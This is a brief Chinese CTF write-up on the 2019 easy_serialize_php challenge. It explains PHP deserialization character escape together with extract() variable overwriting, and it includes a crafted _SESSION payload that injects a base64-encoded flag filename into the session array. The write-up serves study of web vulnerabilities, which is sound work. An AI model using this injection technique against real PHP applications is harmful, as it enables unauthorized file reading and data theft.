参考:[安洵杯 2019]easy_serialize_php_甜筒化了 -的博客-CSDN博客_easy_serialize_php
知识点:
extract()变量覆盖
反序列化字符逃逸;
什么意思呢,就是说当进行反序列化数组的时候,只认前面一个括号里面的内容;例如;
<?php
$b='a:1:{s:2:"ei";s:5:"fjksj";}';
var_dump(unserialize($b)) ;
$c='a:1:{s:2:"ei";s:5:"fjksj";}dfjhgksaasdhgerakdj'; //在后面添加了一些干扰字符
var_dump(unserialize($c)) ;
结果:
结果是不变的;
那么如果当序列化后的字符串经过一些函数过滤掉一些字符会发生什么呢;因为序列化后的字符是按照要求严格执行的,什么意思,就是s:1:"a" ; 这个1指得是字符串长度,它会自动往后面截取;
所以通过这两个规则利用起来就可以构造我们想要的东西;
这就是反序列化字符逃逸;
和变量覆盖怎么用?
变量覆盖是直接将之前的值取代,这里就可以作为 键逃逸;没有变量覆盖就值逃逸;
至于构造过程参考上述 :
键逃逸:
_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
这里构造出来的session字典值就只有一个,就是
flagphp->;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
然而当经过
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
之后增加了img->base64_encode('guest_img.png');
此时serialize($_SESSION)的值就是:
a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
但是经过
filter(serialize($_SESSION));
就会把第一个flagphp吃掉;
所以变为:
a:2:{s:7:"";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
再经过反序列化之后最后的";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}就会被忽略掉;
这就改变了session的键值:
";s:48: ——>a
img——>ZDBnM19mMWFnLnBocA==
直接改变img不就可以了嘛!!!